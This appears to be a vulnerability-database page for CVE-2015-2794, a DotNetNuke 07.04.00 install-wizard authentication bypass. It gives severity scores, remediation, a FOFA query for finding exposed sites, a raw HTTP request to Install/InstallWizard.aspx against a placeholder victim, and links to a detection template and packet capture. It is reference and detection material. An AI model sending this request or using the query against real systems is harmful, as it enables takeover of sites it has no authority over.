🔙 목록으로 돌아가기

CVE-2015-2794: DotNetNuke 07.04.00 - Administration Authentication Bypass

TitleDotNetNuke 07.04.00 - Administration Authentication Bypass
Author0xr2r
SeverityCritical
ImpactAttackers can reinstall the application and escalate privileges to SuperUser, leading to full control over the system.
RemediationUpdate to version 7.4.1 or later to fix the vulnerability.
CVSS Score9.8
EPSS Score0.92349
CVE IDCVE-2015-2794
CWE IDCWE-264
Fofa Queryapp="DotNetNuke"app="dotnetnuke"
Tags cve2015 cve dotnetnuke auth-bypass install vuln

🔍 Vulnerability Description

The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.

🌐 HTTP Request

GET /Install/InstallWizard.aspx?__VIEWSTATE HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-2794.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-2794.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A